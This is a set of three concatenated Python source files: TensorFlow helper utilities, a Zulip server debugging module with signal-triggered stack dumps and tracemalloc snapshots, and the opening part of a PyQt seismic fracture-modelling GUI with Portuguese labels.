f = _Function(inputs, [outputs], updates, givens=givens)
return lambda *args, **kwargs: f(*args, **kwargs)[0]
class _Function(object):
def __init__(self, inputs, outputs, updates, givens):
for inpt in inputs:
if not hasattr(inpt, 'make_feed_dict') and not (type(inpt) is tf.Tensor and len(inpt.op.inputs) == 0):
assert False, "inputs should all be placeholders, constants, or have a make_feed_dict method"
self.inputs = inputs
updates = updates or []
self.update_group = tf.group(*updates)
self.outputs_update = list(outputs) + [self.update_group]
self.givens = {} if givens is None else givens
def _feed_input(self, feed_dict, inpt, value):
if hasattr(inpt, 'make_feed_dict'):
feed_dict.update(inpt.make_feed_dict(value))
else:
feed_dict[inpt] = adjust_shape(inpt, value)
def __call__(self, *args):
assert len(args) <= len(self.inputs), "Too many arguments provided"
feed_dict = {}
# Update the args
for inpt, value in zip(self.inputs, args):
self._feed_input(feed_dict, inpt, value)
# Update feed dict with givens.
for inpt in self.givens:
feed_dict[inpt] = adjust_shape(inpt, feed_dict.get(inpt, self.givens[inpt]))
results = get_session().run(self.outputs_update, feed_dict=feed_dict)[:-1]
return results
# ================================================================
# Flat vectors
# ================================================================
def var_shape(x):
out = x.get_shape().as_list()
assert all(isinstance(a, int) for a in out), \
"shape function assumes that shape is fully known"
return out
def numel(x):
return intprod(var_shape(x))
def intprod(x):
return int(np.prod(x))
def flatgrad(loss, var_list, clip_norm=None):
grads = tf.gradients(loss, var_list)
if clip_norm is not None:
grads = [tf.clip_by_norm(grad, clip_norm=clip_norm) for grad in grads]
return tf.concat(axis=0, values=[
tf.reshape(grad if grad is not None else tf.zeros_like(v), [numel(v)])
for (v, grad) in zip(var_list, grads)
])
class SetFromFlat(object):
def __init__(self, var_list, dtype=tf.float32):
assigns = []
shapes = list(map(var_shape, var_list))
total_size = np.sum([intprod(shape) for shape in shapes])
self.theta = theta = tf.placeholder(dtype, [total_size])
start = 0
assigns = []
for (shape, v) in zip(shapes, var_list):
size = intprod(shape)
assigns.append(tf.assign(v, tf.reshape(theta[start:start + size], shape)))
start += size
self.op = tf.group(*assigns)
def __call__(self, theta):
tf.get_default_session().run(self.op, feed_dict={self.theta: theta})
class GetFlat(object):
def __init__(self, var_list):
self.op = tf.concat(axis=0, values=[tf.reshape(v, [numel(v)]) for v in var_list])
def __call__(self):
return tf.get_default_session().run(self.op)
def flattenallbut0(x):
return tf.reshape(x, [-1, intprod(x.get_shape().as_list()[1:])])
# =============================================================
# TF placeholders management
# ============================================================
_PLACEHOLDER_CACHE = {} # name -> (placeholder, dtype, shape)
def get_placeholder(name, dtype, shape):
if name in _PLACEHOLDER_CACHE:
out, dtype1, shape1 = _PLACEHOLDER_CACHE[name]
if out.graph == tf.get_default_graph():
assert dtype1 == dtype and shape1 == shape, \
'Placeholder with name {} has already been registered and has shape {}, different from requested {}'.format(name, shape1, shape)
return out
out = tf.placeholder(dtype=dtype, shape=shape, name=name)
_PLACEHOLDER_CACHE[name] = (out, dtype, shape)
return out
def get_placeholder_cached(name):
return _PLACEHOLDER_CACHE[name][0]
# ================================================================
# Diagnostics
# ================================================================
def display_var_info(vars):
from baselines import logger
count_params = 0
for v in vars:
name = v.name
if "/Adam" in name or "beta1_power" in name or "beta2_power" in name: continue
v_params = np.prod(v.shape.as_list())
count_params += v_params
if "/b:" in name or "/bias" in name: continue # Wx+b, bias is not interesting to look at => count params, but not print
logger.info(" %s%s %i params %s" % (name, " "*(55-len(name)), v_params, str(v.shape)))
logger.info("Total model parameters: %0.2f million" % (count_params*1e-6))
def get_available_gpus():
# recipe from here:
# https://stackoverflow.com/questions/38559755/how-to-get-current-available-gpus-in-tensorflow?utm_medium=organic&utm_source=google_rich_qa&utm_campaign=google_rich_qa
from tensorflow.python.client import device_lib
local_device_protos = device_lib.list_local_devices()
return [x.name for x in local_device_protos if x.device_type == 'GPU']
# ================================================================
# Saving variables
# ================================================================
def load_state(fname, sess=None):
from baselines import logger
logger.warn('load_state method is deprecated, please use load_variables instead')
sess = sess or get_session()
saver = tf.train.Saver()
saver.restore(tf.get_default_session(), fname)
def save_state(fname, sess=None):
from baselines import logger
logger.warn('save_state method is deprecated, please use save_variables instead')
sess = sess or get_session()
dirname = os.path.dirname(fname)
if any(dirname):
os.makedirs(dirname, exist_ok=True)
saver = tf.train.Saver()
saver.save(tf.get_default_session(), fname)
# The methods above and below are clearly doing the same thing, and in a rather similar way
# TODO: ensure there is no subtle differences and remove one
def save_variables(save_path, variables=None, sess=None):
sess = sess or get_session()
variables = variables or tf.trainable_variables()
ps = sess.run(variables)
save_dict = {v.name: value for v, value in zip(variables, ps)}
dirname = os.path.dirname(save_path)
if any(dirname):
os.makedirs(dirname, exist_ok=True)
joblib.dump(save_dict, save_path)
def load_variables(load_path, variables=None, sess=None):
sess = sess or get_session()
variables = variables or tf.trainable_variables()
loaded_params = joblib.load(os.path.expanduser(load_path))
restores = []
if isinstance(loaded_params, list):
assert len(loaded_params) == len(variables), 'number of variables loaded mismatches len(variables)'
for d, v in zip(loaded_params, variables):
restores.append(v.assign(d))
else:
for v in variables:
restores.append(v.assign(loaded_params[v.name]))
sess.run(restores)
# ================================================================
# Shape adjustment for feeding into tf placeholders
# ================================================================
def adjust_shape(placeholder, data):
'''
adjust shape of the data to the shape of the placeholder if possible.
If shape is incompatible, AssertionError is thrown
Parameters:
placeholder tensorflow input placeholder
data input data to be (potentially) reshaped to be fed into placeholder
Returns:
reshaped data
'''
if not isinstance(data, np.ndarray) and not isinstance(data, list):
return data
if isinstance(data, list):
data = np.array(data)
placeholder_shape = [x or -1 for x in placeholder.shape.as_list()]
assert _check_shape(placeholder_shape, data.shape), \
'Shape of data {} is not compatible with shape of the placeholder {}'.format(data.shape, placeholder_shape)
return np.reshape(data, placeholder_shape)
def _check_shape(placeholder_shape, data_shape):
''' check if two shapes are compatible (i.e. differ only by dimensions of size 1, or by the batch dimension)'''
return True
squeezed_placeholder_shape = _squeeze_shape(placeholder_shape)
squeezed_data_shape = _squeeze_shape(data_shape)
for i, s_data in enumerate(squeezed_data_shape):
s_placeholder = squeezed_placeholder_shape[i]
if s_placeholder != -1 and s_data != s_placeholder:
return False
return True
def _squeeze_shape(shape):
return [x for x in shape if x != 1]
# ================================================================
# Tensorboard interfacing
# ================================================================
def launch_tensorboard_in_background(log_dir):
'''
To log the Tensorflow graph when using rl-algs
algorithms, you can run the following code
in your main script:
import threading, time
def start_tensorboard(session):
time.sleep(10) # Wait until graph is setup
tb_path = osp.join(logger.get_dir(), 'tb')
summary_writer = tf.summary.FileWriter(tb_path, graph=session.graph)
summary_op = tf.summary.merge_all()
launch_tensorboard_in_background(tb_path)
session = tf.get_default_session()
t = threading.Thread(target=start_tensorboard, args=([session]))
t.start()
'''
import subprocess
subprocess.Popen(['tensorboard', '--logdir', log_dir])
|
debug.py
|
import code
import gc
import logging
import os
import signal
import socket
import threading
import traceback
import tracemalloc
from types import FrameType
from django.conf import settings
from django.utils.timezone import now as timezone_now
from typing import Optional
logger = logging.getLogger('zulip.debug')
# Interactive debugging code from
# http://stackoverflow.com/questions/132058/showing-the-stack-trace-from-a-running-python-application
# (that link also points to code for an interactive remote debugger
# setup, which we might want if we move Tornado to run in a daemon
# rather than via screen).
def interactive_debug(sig: int, frame: FrameType) -> None:
"""Interrupt running process, and provide a python prompt for
interactive debugging."""
d = {'_frame': frame} # Allow access to frame object.
d.update(frame.f_globals) # Unless shadowed by global
d.update(frame.f_locals)
message = "Signal received : entering python shell.\nTraceback:\n"
message += ''.join(traceback.format_stack(frame))
i = code.InteractiveConsole(d)
i.interact(message)
# SIGUSR1 => Just print the stack
# SIGUSR2 => Print stack + open interactive debugging shell
def interactive_debug_listen() -> None:
signal.signal(signal.SIGUSR1, lambda sig, stack: traceback.print_stack(stack))
signal.signal(signal.SIGUSR2, interactive_debug)
def tracemalloc_dump() -> None:
if not tracemalloc.is_tracing():
logger.warning("pid {}: tracemalloc off, nothing to dump"
.format(os.getpid()))
return
# Despite our name for it, `timezone_now` always deals in UTC.
basename = "snap.{}.{}".format(os.getpid(),
timezone_now().strftime("%F-%T"))
path = os.path.join(settings.TRACEMALLOC_DUMP_DIR, basename)
os.makedirs(settings.TRACEMALLOC_DUMP_DIR, exist_ok=True)
gc.collect()
tracemalloc.take_snapshot().dump(path)
procstat = open('/proc/{}/stat'.format(os.getpid()), 'rb').read().split()
rss_pages = int(procstat[23])
logger.info("tracemalloc dump: tracing {} MiB ({} MiB peak), using {} MiB; rss {} MiB; dumped {}"
.format(tracemalloc.get_traced_memory()[0] // 1048576,
tracemalloc.get_traced_memory()[1] // 1048576,
tracemalloc.get_tracemalloc_memory() // 1048576,
rss_pages // 256,
basename))
def tracemalloc_listen_sock(sock: socket.socket) -> None:
logger.debug('pid {}: tracemalloc_listen_sock started!'.format(os.getpid()))
while True:
sock.recv(1)
tracemalloc_dump()
listener_pid = None # type: Optional[int]
def tracemalloc_listen() -> None:
global listener_pid
if listener_pid == os.getpid():
# Already set up -- and in this process, not just its parent.
return
logger.debug('pid {}: tracemalloc_listen working...'.format(os.getpid()))
listener_pid = os.getpid()
sock = socket.socket(socket.AF_UNIX, socket.SOCK_DGRAM)
path = "/tmp/tracemalloc.{}".format(os.getpid())
sock.bind(path)
thread = threading.Thread(target=lambda: tracemalloc_listen_sock(sock),
daemon=True)
thread.start()
logger.debug('pid {}: tracemalloc_listen done: {}'.format(
os.getpid(), path))
def maybe_tracemalloc_listen() -> None:
'''If tracemalloc tracing enabled, listen for requests to dump a snapshot.
To trigger once this is listening:
echo | socat -u stdin unix-sendto:/tmp/tracemalloc.$pid
To enable in the Zulip web server: edit /etc/zulip/uwsgi.ini ,
and add e.g. ` PYTHONTRACEMALLOC=5` to the `env=` line.
This function is called in middleware, so the process will
automatically start listening.
To enable in other contexts: see upstream docs
https://docs.python.org/3/library/tracemalloc .
You may also have to add a call to this function somewhere.
'''
if os.environ.get('PYTHONTRACEMALLOC'):
# If the server was started with `tracemalloc` tracing on, then
# listen for a signal to dump `tracemalloc` snapshots.
tracemalloc_listen()
|
fracturePP.py
|
import os
import subprocess
import sys
import threading
import shutil
import numpy as np
from PyQt5 import QtWidgets
from PyQt5.QtWidgets import QMessageBox
from matplotlib.backends.backend_qt5 import NavigationToolbar2QT as NavigationToolbar
from matplotlib.backends.backend_qt5agg import FigureCanvasQTAgg as FigureCanvas
from matplotlib.figure import Figure
from sympy import roots
from sympy.abc import x
from fracturePP_gui import Ui_MainWindow
class MyFirstGuiProgram(Ui_MainWindow):
def __init__(self, dialog):
Ui_MainWindow.__init__(self)
self.setupUi(dialog)
###Cria o layout para plotagem
# figura Tab1
self.fig = Figure(figsize=(8,3),facecolor='white')
self.fig.subplots_adjust(hspace= 0.40, wspace= 0.60,left=0.10, right=0.98, top=0.88, bottom=0.14)
self.canvas = FigureCanvas(self.fig)
self.canvas.setParent(self.widget)
layout = QtWidgets.QVBoxLayout()
self.widget.setLayout(layout)
layout.addWidget(self.canvas)
self.mpl_toolbar = NavigationToolbar(self.canvas, self.widget)
self.fig.text(0.5, 0.1, 'Geofone', va='center')
self.fig.text(0.02, 0.33, 'Tempo(s)', va='center', rotation='vertical')
self.fig.text(0.45, 0.5, 'Ângulo de incidência (graus)', va='center', size= 8)
self.fig.text(0.02, 0.73, 'Coeficiente de reflexão', va='center', rotation='vertical', size=7)
self.axes = self.fig.add_subplot(211)
self.axes2 = self.axes.twiny()
self.axes.grid()
self.axes_time = self.fig.add_subplot(212)
self.axes.tick_params(labelsize=6)
self.axes2.tick_params(labelsize=6)
self.axes_time.tick_params(labelsize=6)
self.axes_time.grid()
#figura tab2
self.fig_anray = Figure(figsize=(9,6), facecolor='white')
self.fig_anray2 = Figure(figsize=(9, 6), facecolor='white')
self.fig_anray.text(0, 0.6, 'Coeficiente de reflexão', va='center', rotation='vertical')
self.fig_anray.text(0.985, 0.6, 'Separação', va='center', rotation='vertical')
self.fig_anray.text(0.48, 0.12, 'Distância(m)', va='center')
self.fig_anray2.text(0, 0.6, 'Coeficiente de reflexão', va='center', rotation='vertical')
self.fig_anray2.text(0.48, 0.12, 'Distância(m)', va='center')
self.canvas_anray = FigureCanvas(self.fig_anray)
self.canvas_anray2 = FigureCanvas(self.fig_anray2)
self.canvas_anray.setParent(self.widget_anray)
self.canvas_anray2.setParent(self.widget_anray2)
layout = QtWidgets.QVBoxLayout()
layout2 = QtWidgets.QVBoxLayout()
self.widget_anray.setLayout(layout)
layout.addWidget(self.canvas_anray)
self.widget_anray2.setLayout(layout2)
layout2.addWidget(self.canvas_anray2)
self.mpl_toolbar = NavigationToolbar(self.canvas_anray, self.widget_anray)
self.mpl_toolbar2 = NavigationToolbar(self.canvas_anray2, self.widget_anray2)
self.fig_anray.subplots_adjust(hspace=0.27, left=0.10, right=0.92, top=0.92, bottom=0.18)
self.fig_anray2.subplots_adjust(hspace=0.27, left=0.10, right=0.98, top=0.93, bottom=0.18)
#subplots
self.axes_anray_tot = self.fig_anray.add_subplot(411)
self.axes_anray2_tot = self.fig_anray2.add_subplot(411)
self.axes_anray_tot2 = self.axes_anray_tot.twinx()
self.axes_anray_tot.set_ylabel("total")
self.axes_anray2_tot.set_ylabel("total")
self.axes_anray_rad = self.fig_anray.add_subplot(412)
self.axes_anray2_rad = self.fig_anray2.add_subplot(412)
self.axes_anray_rad.set_ylabel("radial")
self.axes_anray2_rad.set_ylabel("radial")
self.axes_anray_rad2 = self.axes_anray_rad.twinx()
self.axes_anray_z = self.fig_anray.add_subplot(413)
self.axes_anray2_z = self.fig_anray2.add_subplot(413)
self.axes_anray_z.set_ylabel("vertical")
self.axes_anray2_z.set_ylabel("vertical")
self.axes_anray_z2 = self.axes_anray_z.twinx()
self.axes_anray_time = self.fig_anray.add_subplot(414)
self.axes_anray2_time = self.fig_anray2.add_subplot(414)
self.axes_anray_time.set_ylabel('tempo')
self.axes_anray2_time.set_ylabel('tempo')
self.axes_anray_tot.grid()
self.axes_anray_rad.grid()
self.axes_anray2_rad.grid()
self.axes_anray_z.grid()
self.axes_anray_time.grid()
self.axes_anray2_tot.grid()
self.axes_anray2_z.grid()
self.axes_anray2_time.grid()
self.axes_anray_tot.tick_params(labelsize=6)
self.axes_anray_rad.tick_params(labelsize=6)
self.axes_anray2_rad.tick_params(labelsize=6)
self.axes_anray_tot2.tick_params(labelsize=6)
self.axes_anray_rad2.tick_params(labelsize=6)
self.axes_anray_z.tick_params(labelsize=6)
self.axes_anray_z2.tick_params(labelsize=6)
self.axes_anray2_tot.tick_params(labelsize=6)
self.axes_anray2_z.tick_params(labelsize=6)
###
#figura tab3
self.fig_sismo = Figure(dpi=50, facecolor='white')
self.canvas_sismo = FigureCanvas(self.fig_sismo)
self.canvas_sismo.setParent(self.widget_sismo)
self.fig_sismo.subplots_adjust(wspace=0.11, left=0.05, right=0.98, top=0.93, bottom=0.10)
layout = QtWidgets.QVBoxLayout()
self.widget_sismo.setLayout(layout)
layout.addWidget(self.canvas_sismo)
self.axes_sismo_x = self.fig_sismo.add_subplot(121)
self.axes_sismo_z = self.fig_sismo.add_subplot(122)
self.mpl_toolbar = NavigationToolbar(self.canvas_sismo, self.widget_sismo)
self.fig_sismo.text(0.48, 0.04, 'Distância (m)', va='center', size= 14)
self.fig_sismo.text(0.01, 0.5, 'Tempo (s)', va='center', rotation='vertical', size= 14)
self.fig_sismo.text(0.25, 0.96, 'Radial', va='center', size= 14)
self.fig_sismo.text(0.75, 0.96, 'Vertical', va='center', size=14)
#figura tab4
self.fig_sismo2 = Figure(dpi=100, facecolor='white')
self.canvas_sismo2 = FigureCanvas(self.fig_sismo2)
self.canvas_sismo2.setParent(self.widget_sismo2)
self.fig_sismo2.set_tight_layout(True)
layout = QtWidgets.QVBoxLayout()
self.widget_sismo2.setLayout(layout)
layout.addWidget(self.canvas_sismo2)
self.axes_sismo2_1 = self.fig_sismo2.add_subplot(211)
self.axes_sismo2_2 = self.fig_sismo2.add_subplot(212)
self.mpl_toolbar = NavigationToolbar(self.canvas_sismo2, self.widget_sismo2)
###Define os valores iniciais
self.spinBox_vp1.setValue(2250)
self.spinBox_vs1.setValue(1200)
self.spinBox_p1.setValue(2100)
self.spinBox_vp2.setValue(4500)
self.spinBox_vs2.setValue(2500)
self.spinBox_p2.setValue(2700)
#Velocidades do modelo de Ruger1997 (para teste)
# self.spinBox_vp1.setValue(2260)
# self.spinBox_vs1.setValue(1428)
# self.spinBox_p1.setValue(2600)
# self.spinBox_vp2.setValue(2485)
# self.spinBox_vs2.setValue(1489)
# self.spinBox_p2.setValue(2700)
self.doubleSpinBox_aspect.setValue(0.01)
self.spinBox_fract.setValue(5)
self.doubleSpinBox_bulk.setValue(2.2)
self.doubleSpinBox_shear.setValue(0)
self.spinBox_thick.setValue(100)
self.spinBox_ngeo.setValue(48)
self.spinBox_rmin.setValue(20)
self.spinBox_rstep.setValue(2)
self.size = 0
self.size_plot = 0
self.time_basalto =0
self.time_solo = 0
self.refl_tot_0 = 0
self.refl_tot_30 = 0
self.refl_tot_45 = 0
self.refl_tot_60 = 0
self.refl_tot_90 = 0
self.refl_x_0 = 0
self.refl_x_30 = 0
self.refl_x_45 = 0
self.refl_x_60 = 0
self.refl_x_90 = 0
self.refl_y_0 = 0
self.refl_y_30 = 0
self.refl_y_45 = 0
self.refl_y_60 = 0
self.refl_y_90 = 0
self.refl_z_0 = 0
self.refl_z_30 = 0
self.refl_z_45 = 0
self.refl_z_60 = 0
self.refl_z_90 = 0
self.refl_solo_rad_0 = 0
self.refl_solo_y_0 = 0
self.refl_solo_z_0 = 0
self.refl_solo_x_30 = 0
self.refl_solo_y_30 = 0
self.refl_solo_z_30 = 0
self.refl_solo_x_45 = 0
self.refl_solo_y_45 = 0
self.refl_solo_z_45 = 0
self.refl_solo_x_60 = 0
self.refl_solo_y_60 = 0
self.refl_solo_z_60 = 0
self.refl_solo_x_60 = 0
self.refl_solo_y_60 = 0
self.refl_solo_z_60 = 0
self.refl_solo_x_90 = 0
self.refl_solo_y_90 = 0
self.refl_solo_z_90 = 0
self.solo_fase_rad = 0 #para o solo as fases são iguais em todos azimutes...
self.solo_fase_z = 0
self.hti_fase_rad_0 = 0
self.hti_fase_rad_30 = 0
self.hti_fase_rad_45 = 0
self.hti_fase_rad_60 = 0
self.hti_fase_rad_90 = 0
self.hti_fase_z_0 = 0
self.hti_fase_z_30 = 0
self.hti_fase_z_45 = 0
self.hti_fase_z_60 = 0
self.hti_fase_z_90 = 0
self.dn = 0
self.dt = 0
self.dist=0
###
###define as ações
self.spinBox_vp1.valueChanged.connect(self.vp1)
self.spinBox_vp2.valueChanged.connect(self.vp2)
self.spinBox_vs1.valueChanged.connect(self.plot)
self.spinBox_p1.valueChanged.connect(self.plot)
self.spinBox_vp2.valueChanged.connect(self.weak_calc)
self.spinBox_vs2.valueChanged.connect(self.weak_calc)
self.spinBox_p2.valueChanged.connect(self.weak_calc)
self.doubleSpinBox_aspect.valueChanged.connect(self.weak_calc)
self.spinBox_fract.valueChanged.connect(self.slider_pos)
self.doubleSpinBox_aspect.valueChanged.connect(self.slider_pos)
self.doubleSpinBox_bulk.valueChanged.connect(self.weak_calc)
self.doubleSpinBox_shear.valueChanged.connect(self.weak_calc)
self.verticalSlider_fract.valueChanged.connect(self.weak_calc)
self.verticalSlider_aspect.valueChanged.connect(self.slider_pos1)
self.doubleSpinBox_DN.valueChanged.connect(self.slider_pos2)
self.doubleSpinBox_DT.valueChanged.connect(self.slider_pos2)
self.verticalSlider_DN.valueChanged.connect(self.slider_pos3)
self.verticalSlider_DT.valueChanged.connect(self.slider_pos3)
self.doubleSpinBox_d.valueChanged.connect(self.plot)
self.doubleSpinBox_e.valueChanged.connect(self.plot)
self.doubleSpinBox_y.valueChanged.connect(self.plot)
self.spinBox_ngeo.valueChanged.connect(self.plot)
self.spinBox_rmin.valueChanged.connect(self.plot)
self.spinBox_rstep.valueChanged.connect(self.plot)
self.spinBox_thick.valueChanged.connect(self.plot)
self.split_box0_90.stateChanged.connect(self.plot)
self.split_box0_45.stateChanged.connect(self.plot)
self.split_box45_90.stateChanged.connect(self.plot)
self.split_box30_60.stateChanged.connect(self.plot)
self.split_box_anray_0_90.stateChanged.connect(self.split)
self.split_box_anray_0_45.stateChanged.connect(self.split)
self.split_box_anray_30_60.stateChanged.connect(self.split)
self.split_box_anray_45_90.stateChanged.connect(self.split)
self.pushButton.clicked.connect(self.anray)
self.checkBox_solo.pressed.connect(self.activate)
self.checkBox_solo.released.connect(self.plot)
self.pushButton_2.pressed.connect(self.plot)
self.verticalSlider_aspect.valueChanged.connect(self.slider_pos1)
self.sismo_button.clicked.connect(self.plot_sismograma)
self.radioButton_0.toggled.connect(self.plot_sismograma_v)
self.radioButton_30.toggled.connect(self.plot_sismograma_v)
self.radioButton_45.toggled.connect(self.plot_sismograma_v)
self.radioButton_60.toggled.connect(self.plot_sismograma_v)
self.radioButton_90.toggled.connect(self.plot_sismograma_v)
self.radioButton_plot_x.toggled.connect(self.plot_sismo_azim)
self.radioButton_plot_z.toggled.connect(self.plot_sismo_azim)
self.radio_sismo_0_90.toggled.connect(self.plot_sismo_azim)
self.radio_sismo_0_45.toggled.connect(self.plot_sismo_azim)
self.radio_sismo_45_90.toggled.connect(self.plot_sismo_azim)
self.radio_sismo_30_60.toggled.connect(self.plot_sismo_azim)
self.checkBox_solo_sismo.clicked.connect(self.sismo_enable)
self.az_tmin.valueChanged.connect(self.plot_sismo_azim)
self.az_tmax.valueChanged.connect(self.plot_sismo_azim)
self.slider_pos()
self.anray_path = os.getcwd()
if not os.path.exists('HTI_P_model'):
os.makedirs('HTI_P_model')
def vp1(self):
vp = self.spinBox_vp1.value()
vs = vp/np.sqrt(3)
self.spinBox_vs1.setValue(vs)
def vp2(self):
vp = self.spinBox_vp2.value()
vs = vp/np.sqrt(3)
self.spinBox_vs2.setValue(vs)
def message(self):
msg = QMessageBox()
msg.setIcon(QMessageBox.Warning)
msg.setText("Erro")
msg.setInformativeText("Certifique-se de gerar os arquivos e manter a opção (solo) correspondente na primeira aba.")
msg.exec_()
#Função para ativar a camada de solo nos cálculos
def activate(self):
if self.checkBox_solo.isChecked():
self.solo_espessura.setDisabled(True)
self.solo_vp.setDisabled(True)
self.solo_vs.setDisabled(True)
self.solo_densidade.setDisabled(True)
else:
self.solo_espessura.setEnabled(True)
self.solo_vp.setEnabled(True)
self.solo_vs.setEnabled(True)
self.solo_densidade.setEnabled(True)
self.pushButton_2.setEnabled(True)
#Funções para ajustar spinbox e slider.
def slider_pos(self):
self.verticalSlider_fract.setValue(self.spinBox_fract.value())
def slider_pos1(self):
self.doubleSpinBox_aspect.setValue(self.verticalSlider_aspect.value() / 10000)
def slider_pos2(self):
self.verticalSlider_DN.setValue(self.doubleSpinBox_DN.value()*1000)
self.verticalSlider_DT.setValue(self.doubleSpinBox_DT.value()*1000)
def slider_pos3(self):
self.doubleSpinBox_DN.setValue(self.verticalSlider_DN.value()/1000)
self.doubleSpinBox_DT.setValue(self.verticalSlider_DT.value()/1000)
self.aniso_parameters()
#Função para calcular os parametros de fraqueza
def weak_calc(self):
self.doubleSpinBox_DN.valueChanged.disconnect(self.slider_pos2)
self.doubleSpinBox_DT.valueChanged.disconnect(self.slider_pos2)
self.verticalSlider_DN.valueChanged.disconnect(self.slider_pos3)
self.verticalSlider_DT.valueChanged.disconnect(self.slider_pos3)
#Ajusta o valor do spinbox de acordo com o slider
self.spinBox_fract.setValue(self.verticalSlider_fract.value())
self.verticalSlider_aspect.setValue(self.doubleSpinBox_aspect.value()*10000)
# grau de fraturamento e aspect_ratio
e = self.spinBox_fract.value() / 100
a = self.doubleSpinBox_aspect.value()
vp2 = self.spinBox_vp2.value()
vs2 = self.spinBox_vs2.value()
p2 = self.spinBox_p2.value()
g = (vs2 ** 2) / (vp2 ** 2)
# parametro de Lame
mu = p2 * (vs2 ** 2)
# bulk and shear modulus
kl = self.doubleSpinBox_bulk.value() * 10 ** 9
ul = self.doubleSpinBox_shear.value() * 10 ** 9
# grau de fraturamento de Hudson. Obtido de Chen 2014 (2) e Bakulin 2000 (14)
DN = 4 * e / (3 * g * (1 - g) * (1 + ((kl + (4 / 3) * ul) / (np.pi * (1 - g) * mu * a))))
self.doubleSpinBox_DN.setValue(DN)
self.verticalSlider_DN.setValue(DN*1000)
DT= 16 * e / (3 * (3 - 2 * g) * (1 + ((4 * ul) / (np.pi * (3 - 2 * g) * mu * a))))
self.doubleSpinBox_DT.setValue(DT)
self.verticalSlider_DT.setValue(DT*1000)
self.doubleSpinBox_DN.valueChanged.connect(self.slider_pos2)
self.doubleSpinBox_DT.valueChanged.connect(self.slider_pos2)
self.verticalSlider_DN.valueChanged.connect(self.slider_pos3)
self.verticalSlider_DT.valueChanged.connect(self.slider_pos3)
self.aniso_parameters()
#Função que calcula os parametros de anisotropia
def aniso_parameters(self):
self.doubleSpinBox_d.valueChanged.disconnect(self.plot)
self.doubleSpinBox_e.valueChanged.disconnect(self.plot)
self.doubleSpinBox_y.valueChanged.disconnect(self.plot)
vp2 = self.spinBox_vp2.value()
vs2 = self.spinBox_vs2.value()
p2 = self.spinBox_p2.value()
DN_H = self.doubleSpinBox_DN.value()
DT_H = self.doubleSpinBox_DT.value()
# A partir de Chen 2014 e Bakulin 2000 (27)
# parametros de Lame
lamb = p2 * (vp2 ** 2 - 2 * (vs2 ** 2))
mu = p2 * (vs2 ** 2)
M = lamb + 2 * mu
r = lamb / M
c11 = M * (1 - DN_H)
c33 = M * (1 - (r ** 2) * DN_H)
c13 = lamb * (1 - DN_H)
c44 = mu
c66 = mu * (1 - DT_H)
c55 = c66
c23 = c33 - 2 * c44
self.c11 = (c11/p2)/1000000
self.c13 = (c13/p2)/1000000
self.c23 = (c23/p2)/1000000
self.c33 = (c33/p2)/1000000
self.c44 = (c44/p2)/1000000
self.c55 = (c55 /p2)/1000000
#Para imprimir os parâmetros elásticos, descomentar as linhas abaixo.
# print('A11=', c11/p2)
# print('A13=', c13/p2)
# print('A23=', c23/p2)
# print('A33=', c33/p2)
# print('A44=', c44/p2)
# print('A55=', c55/p2)
self.dn = DN_H
self.dt = DT_H
e2_v = (c11 - c33) / (2 * c33)
self.doubleSpinBox_e.setValue(abs(e2_v))
d2_v = (((c13 + c55) ** 2) - ((c33 - c55) ** 2)) / (2 * c33 * (c33 - c55))
self.doubleSpinBox_d.setValue(abs(d2_v))
y2_v = (c66 - c44) / (2 * c44)
self.doubleSpinBox_y.setValue(abs(y2_v))
self.doubleSpinBox_d.valueChanged.connect(self.plot)
self.doubleSpinBox_e.valueChanged.connect(self.plot)
self.doubleSpinBox_y.valueChanged.connect(self.plot)
self.plot()
#Função que realiza a plotagem principal
def plot(self):
self.axes.cla()
self.axes_time.cla()
# Parametros do meio superior(1)
vp1 = self.spinBox_vp1.value()
vs1 = self.spinBox_vs1.value()
p1 = self.spinBox_p1.value()
# Parametros do meio inferior(2)
vp2 = self.spinBox_vp2.value()
vs2 = self.spinBox_vs2.value()
p2 = self.spinBox_p2.value()
# Impedância vertical
Z1 = p1 * vp1
Z2 = p2 * vp2
# Módulo de cisalhamento
G1 = p1 * pow(vs1, 2)
G2 = p2 * pow(vs2, 2)
# diferenças e médias
deltaZ = Z2 - Z1
medZ = (Z1 + Z2) / 2
deltaG = G2 - G1
medG = (G1 + G2) / 2
deltavp = vp2 - vp1
deltavp = vp2 - vp1
medvp = (vp1 + vp2) / 2
deltavs = vs2 - vs1
medvs = (vs1 + vs2) / 2
deltad = -self.doubleSpinBox_d.value()
deltae = -self.doubleSpinBox_e.value()
deltay = self.doubleSpinBox_y.value()
rmin = self.spinBox_rmin.value()
rstep = self.spinBox_rstep.value()
thick = self.spinBox_thick.value()
# ângulo de incidência crítico
ang_critico = np.arcsin(vp1 / vp2)
ang_critico_graus = ang_critico * 180 / np.pi
ang_text = str(round(ang_critico_graus,1))
self.label_33.setText('Ângulo crítico = ' + ang_text)
# angulo, geofone e cálculo de tempo
ngeo = self.spinBox_ngeo.value()
if self.checkBox_solo.isChecked():
v1 = self.solo_vp.value()
v2 = self.spinBox_vp1.value()
p1 = self.solo_espessura.value()
p2 = thick
theta_solo, a = self.geofone_to_angle(ngeo, rmin, rstep, p1)
geo, time1 = self.reflect_travel_time(1, p1, theta_solo, v1, 0, 0, 0)
theta = self.geofone_to_angle_2(ngeo, rmin, rstep, v1, v2, p1, p2)
geo, time2 = self.reflect_travel_time(2, p1, 0, v1, p2, theta, v2)
self.time_basalto = time2
self.time_solo = time1
self.axes_time.plot(geo, time1, color= 'brown', label='Solo')
self.axes_time.plot(geo, time2, color= 'blue', label='Basalto')
else:
theta, a = self.geofone_to_angle(ngeo, rmin, rstep, thick)
geo, time = self.reflect_travel_time(1, thick, theta, vp1, 0, 0, 0)
self.time_basalto = time
self.axes_time.plot(geo, time, color= 'blue', label = 'Basalto')
self.axes_time.grid()
self.axes_time.legend(title='Reflexão')
self.dist = a
#Azimutes para o calculo do coeficiente de reflexão
phi1 = 0
phi2 = 30
phi3 = 45
phi4 = 60
phi5 = 90
A = (deltaZ / medZ) / 2
B1 = 0.5* (deltavp / medvp - (pow(2 * medvs / medvp, 2) * deltaG / medG) + (deltad + 2 * pow(2 * medvs / medvp, 2) * deltay) * pow(np.cos(phi1 * np.pi / 180), 2))
C1 = 0.5* (deltavp / medvp + deltae * pow(np.cos(phi1 * np.pi / 180), 4) + deltad * pow(np.sin(phi1 * np.pi / 180), 2) * pow(np.cos(phi1 * np.pi / 180), 2))
B2 = 0.5* (deltavp / medvp - (pow(2 * medvs / medvp, 2) * deltaG / medG) + (deltad + 2 * pow(2 * medvs / medvp, 2) * deltay) * pow(np.cos(phi2 * np.pi / 180), 2))
